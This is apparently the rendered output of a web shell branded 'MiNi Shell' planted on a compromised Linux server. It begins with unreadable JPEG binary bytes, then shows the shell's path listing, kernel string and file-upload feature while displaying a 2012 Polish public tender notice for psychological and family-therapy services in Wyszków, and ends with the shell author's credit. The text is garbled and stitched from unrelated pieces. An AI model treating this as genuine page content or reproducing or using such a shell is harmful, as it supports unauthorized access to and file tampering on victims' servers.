JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120517/158822-N-2012.html

<p class="kh_header"><b>Wyszków: Świadczenie usług psychologicznych dla uczestników projektu systemowego SZANSA</b><br>
<b>Numer ogłoszenia: 158822 - 2012; data zamieszczenia: 17.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Wyszkowie , ul. 3 Maja 16, 07-200 Wyszków, woj. mazowieckie, tel. (029) 742 49 02, faks (029) 742 49 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.wyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług psychologicznych dla uczestników projektu systemowego SZANSA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie przez Wykonawcę  na rzecz Zamawiającego usługi polegającej na pełnieniu funkcji asystenta rodziny oraz przeprowadzenie indywidualnych konsultacji ze specjalistami.
Zamówienie zostało podzielone na  4 Części:
1.	Asystent rodziny,
2.	Indywidualne konsultacje z psychologiem,
3.	Indywidualne konsultacje ze specjalistą od uzależnień,
4.	Terapia rodzinna,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.00.00-5, 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli wykonawca wykaże, że dysponuje/lub będzie dysponował  osobami  zdolnymi  do wykonania zamówienia tj.

- Część I Asystent rodziny  - 1 osoba posiadająca:
-    wykształcenie wyższe o kierunku psychologia, socjologia, nauki o rodzinie/ lub praca socjalna,
-  lub wykształcenie wyższe na dowolnym kierunku, uzupełnione szkoleniem w zakresie pracy z dziećmi lub rodziną i udokumentuje co najmniej roczny staż pracy z dziećmi  lub rodziną lub studiami podyplomowymi obejmującymi zakres programowy szkolenia określony w Rozporządzeniu Ministra Pracy i polityki Społecznej z dnia 9 grudnia 2011r (Dz. U Nr 272 poz. 1608) w sprawie szkolenia na asystenta rodziny, lub 
- co najmniej wykształcenie średnie, szkolenie z zakresu pracy z rodziną i z dziećmi lub rodziną i udokumentuje co najmniej 3 letni staż pracy z dziećmi lub rodziną oraz ukończone szkolenie, którego zakres programowy określono w w/w rozporządzeniu.
- Część II  Indywidualne konsultacje z psychologiem   1 osoba
1)posiadająca wykształcenie wyższe z tytułem magistra psychologii,
2)5 letnie doświadczenie prowadzenia konsultacji, poradnictwa psychologicznego z osobami wykluczonymi społecznie bądź zagrożonymi wykluczeniem społecznym,
3)szkolenia z zakresu pracy psychologicznej (np. dotyczące problematyki rodzinnej, wychowawczej, przemocowej, rozwiazywania konfliktów)

Część III Indywidualne konsultacje ze specjalistą ds. uzależnień  1 osoba
1)posiadająca wykształcenie wyższe z tytułem psychologii,
1)posiadająca 5 letnie doświadczenie z osobami wykluczonymi społecznie bądź zagrożonymi wykluczeniem społecznym z powodu uzależnienia,
2)szkolenie z zakresu pracy terapeutycznej z osobami uzależnionymi od alkoholu i innych  substancji psychoaktywnych i ich rodzin,
Część IV Terapia rodzinna  2 osoby
2)osoba posiadająca wykształcenie wyższe z tytułem magistra psychologii,
3)posiadająca 5 letnie doświadczenie w prowadzeniu terapii z osobami wykluczonymi społecznie bądź zagrożonymi   wykluczeniem społecznym
4)ukończony kurs systemowej terapii rodzin
 (warunki dotyczą 2 osób, dla każdej oddzielnie)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty zawierający m.in. cenę za wykonanie zamówienia, termin realizacji zamówienia, oświadczenie o zapoznaniu się z warunkami przetargu i warunkami przyszłej umowy oraz o przyjęciu tych warunków bez zastrzeżeń, informacją o Podwykonawcach.
2.	Oświadczenie Wykonawcy, że nie pozostaje w zatrudnieniu na podstawie stosunku pracy w instytucjach uczestniczących w realizacji POKL. Załącznik Nr 4 do oferty.
3.	Formularz cenowy  Załącznik Nr 6 do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zmiany w określeniu stron umowy, o ile zasadność tej zmiany wynika z przepisów prawa na skutek np. połączenia, przekształcenia lub zmiany firmy bądź siedziby strony.
2)	Zamawiający zastrzega sobie zmianę liczby uczestników</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.wyszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Wyszkowie
ul. 3 Maja 16
07-200 Wyszków
Sekretariat pok. 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Wyszkowie
ul. 3 Maja 16
07-200 Wyszków
Sekretariat pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie w ramach projektu systemowego SZANSA. Projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Asystent rodziny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres pracy:
- opracowywanie i realizacja planu pracy z rodziną we współpracy z członkami rodziny i w konsultacji      z pracownikiem socjalnym. Przewidywana ilość godzin 192 godz. dla 3 rodzin.
- odbycia co najmniej 8 spotkań w każdym miesiącu z każdą prowadzoną osobą/rodziną , w tym każde spotkanie winno trwać min 60 min. Z każdą osobą/jej otoczeniem(rodziną)
- wsparcie i aktywizacja rodzin zagrożonych wykluczeniem społecznym biorących udział w projekcie
- kierowanie procesem zmiany postaw życiowych członków rodzin
- wspieranie aktywności społecznej rodzin
- podejmowanie działań interwencyjnych i zaradczych w sytuacji zagrożenia bezpieczeństwa dzieci i rodzin
- współpraca z instytucjami takimi jak szkoła, przedszkole, sąd, urząd pracy, urząd miasta itp.
- pomoc w wypełnianiu zadań opiekuńczo wychowawczych
- merytoryczna pomoc w prowadzeniu gospodarstwa domowego
- motywowanie członków rodzin do podnoszenia kwalifikacji zawodowych, udzielanie pomocy w poszukiwaniu pracy
- asystent rodziny będzie świadczyć usługi w miejscu zamieszkania rodziny, jak również poza miejscem zamieszkania  w godzinach uzależnionych od indywidualnych potrzeb - zgodnie z opracowanym planem pracy w konsultacji z pracownikiem socjalnym i we współpracy z członkami rodzin 
- prowadzenie dokumentacji dotyczącej pracy z rodziną, dokonywanie ocen sytuacji i przekazywanie tych informacji podmiotowi organizującemu pracę z rodziną. Prowadzenie Karty asystenta rodziny
- sporządzanie na wniosek sądu, opinii o rodzinie i jej członkach
 Wymagania konieczne:
Asystentem rodziny może być osoba, która:
- posiada wykształcenie wyższe o kierunku psychologia, socjologia, nauki o rodzinie lub praca socjalna lub wykształcenie wyższe na dowolnym kierunku, uzupełnione szkoleniem w zakresie pracy z dziećmi lub rodziną i udokumentuje co najmniej roczny staż pracy z dziećmi lub rodziną lub studiami podyplomowymi obejmującymi,  zakres programowy szkolenia określony w Rozporządzeniu Ministra Pracy i polityki Społecznej z dnia 9 grudnia 2011r (Dz. U Nr 272 poz. 1608) w sprawie szkolenia na asystenta rodziny, lub 
i udokumentuje co najmniej roczny staż pracy z dziećmi i rodziną lub co najmniej wykształcenie średnie, szkolenie z zakresu pracy z rodziną i z dziećmi lub rodziną i udokumentuje co najmniej 3 letni staż pracy z dziećmi lub rodziną
- nie jest i nie była pozbawiona władzy rodzicielskiej oraz władza rodzicielska nie jest jej zawieszona ani ograniczona
- wypełnia obowiązek alimentacyjny - w przypadku,  gdy taki obowiązek w stosunku do niej wynika z   tytułu egzekucyjnego
- korzysta z pełni praw publicznych
- posiada nieposzlakowaną opinię
- nie jest karana za przestępstwa popełnione umyślnie lub umyślne przestępstwo skarbowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.00.00-5, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Indywidualne konsultacje z psychologiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Indywidualne konsultacje z psychologiem
Głównym celem indywidualnego wsparcia psychologicznego jest doraźna pomoc psychologiczna skoncentrowana na problemie, z którym się zgłaszają uczestnicy/uczestniczki projektu. Spotkania mogą być jednorazowe lub kilkukrotne na których podejmowane są próby znalezienia rozwiązania problemu i udzielenia wsparcia osobie znajdującej się w sytuacji trudnej, kryzysowej.

1. przewidywana liczba godzin indywidualnych konsultacji to maksymalnie 30 godz. Zamawiający zastrzega sobie prawo zmniejszenia liczby godzin, co nie będzie stanowiło odstąpienia od zawartej umowy.
2. okoliczność, o której mowa w pkt. 1, nie będzie podstawą jakichkolwiek roszczeń ze strony Wykonawcy względem zamawiającego.
3. Wykonawca zobowiązany jest zapewnić uczestnikom konsultacji niezbędne materiały wspierające. Wykonawca zobowiązany jest do przekazania 1 kompletu materiałów Zamawiającemu w celu archiwizacji.
4. Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia w granicach administracyjnych miasta Wyszków w sali zapewnionej przez Zamawiającego.
5. Wykonawca zobowiązany jest do dostosowania zakresu konsultacji do specyficznych potrzeb grupy, na rzecz której świadczona będzie usługa.
6.  Wykonawca zobowiązany jest realizować przedmiotową usługę w godzinach pomiędzy                         8.00 - 20.00, w dniach od poniedziałku do soboty. Szczegółowy termin wykonywanej usługi zostanie uzgodniony przez Zamawiającego w porozumieniu z Wykonawcą i uczestnikami projektu.
7. Wykonawca zobowiązany jest do sporządzenia i prowadzenia dokumentacji wykonywanych usług na zasadach i w formie wskazanej przez Zamawiającego. Po zakończeniu realizacji usługi Wykonawca zobowiązany jest do przekazania Zamawiającemu  następujących dokumentów:
- oryginał listy obecności uczestników konsultacji,
- zapisu konsultacji,
- opinię rozwoju uczestnika,
- zaświadczenie dla uczestnika o odbyciu konsultacji,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.00.00-5, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Indywidualne konsultacje ze specjalistą ds. uzaleznień.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Głównym celem w/w konsultacji psychologicznych będzie praca nad motywacją wewnętrzną do zaprzestania picia alkoholu, podjęcia profesjonalnej terapii odwykowej i trwałej zamiany postawy życiowej. Tworzenie indywidualnych planów zapobiegania nawrotom picia poprzez indywidualną prace nad zgłaszanymi problemami. Celem konsultacji ma być również nabycie przez osoby uzależnione umiejętności radzenia sobie w sytuacjach trudnych, wyrażania emocji.

1. Przewidywana liczba godzin indywidualnych konsultacji to maksymalnie 30 godz. Zamawiający zastrzega sobie prawo zmniejszenia liczby godzin, co nie będzie stanowiło odstąpienia od zawartej umowy
2. Okoliczność, o której mowa w pkt. 1, nie będzie podstawą jakichkolwiek roszczeń ze strony Wykonawcy względem zamawiającego
3. Wykonawca zobowiązany jest zapewnić uczestnikom konsultacji niezbędne materiały wspierające. Wykonawca zobowiązany jest do przekazania 1 kompletu materiałów Zamawiającemu w celu archiwizacji.
4. Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia w granicach administracyjnych miasta Wyszków w sali zapewnionej przez Zamawiającego.
5. Wykonawca zobowiązany jest do dostosowania zakresu konsultacji do specyficznych potrzeb grupy, na rzecz której świadczona będzie usługa
6.  Wykonawca zobowiązany jest realizować przedmiotową usługę w godzinach pomiędzy                          8.00 - 20.00, w dniach od poniedziałku do soboty. Szczegółowy termin wykonywanej usługi uzgodniony zostanie przez Zamawiającego w porozumieniu z Wykonawcą i uczestnikami projektu.
7. Wykonawca zobowiązany jest do sporządzenia i prowadzenia dokumentacji wykonywanych usług na zasadach i w formie wskazanej przez zamawiającego. Po zakończeniu realizacji usługi Wykonawca zobowiązany jest do przekazania Zamawiającemu  następujących dokumentów:
- oryginał listy obecności uczestników konsultacji
- zapisu konsultacji
- opinię rozwoju uczestnika
- zaświadczenie dla uczestnika o odbyciu konsultacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.00.00-5, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Terapia rodzinna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Głównym celem terapii rodzinnej jest leczenie zaburzeń w funkcjonowaniu rodziny metodami psychologicznymi, poprzez interwencję w system rodziny, która ma doprowadzić do istotnych zmian w jego funkcjonowaniu. Zrozumienie problemów rodziny i wspólne poszukiwanie możliwości ich rozwiązania. Prowadzenie terapii odbywa się przez 2 terapeutów: prowadzącego i wspomagającego. 

1. Przewidywana liczba godzin terapii rodzinnej to maksymalnie 120 godz. Zamawiający zastrzega sobie prawo zmniejszenia liczby godzin, co nie będzie stanowiło odstąpienia od zawartej umowy
2. Okoliczność, o której mowa w pkt. 1, nie będzie podstawą jakichkolwiek roszczeń ze strony Wykonawcy względem zamawiającego
3. Wykonawca zobowiązany jest zapewnić uczestnikom terapii niezbędne materiały wspierające. Wykonawca zobowiązany jest do przekazania 1 kompletu materiałów Zamawiającemu w celu archiwizacji.
4. Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia w granicach administracyjnych miasta Wyszków w sali zapewnionej przez Zamawiającego.
5. Wykonawca zobowiązany jest do dostosowania zakresu terapii do specyficznych, indywidualnych  potrzeb rodziny, na rzecz której świadczona będzie usługa
6.  Wykonawca zobowiązany jest realizować przedmiotową usługę w godzinach pomiędzy                          8.00 - 20.00, w dniach od poniedziałku do soboty. Szczegółowy termin wykonywanej usługi uzgodniony zostanie przez Zamawiającego w porozumieniu z Wykonawcą i uczestnikami projektu
7. Wykonawca zobowiązany jest do sporządzenia i prowadzenia dokumentacji wykonywanych usług na zasadach i w formie wskazanej przez zamawiającego. Po zakończeniu realizacji usługi Wykonawca zobowiązany jest do przekazania Zamawiającemu  następujących dokumentów:
- oryginał listy obecności uczestników terapii rodzinnej
- zapisu terapii
- opinię o rodzinie
- zaświadczenie dla uczestnika o odbyciu terapii rodzinnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.00.00-5, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com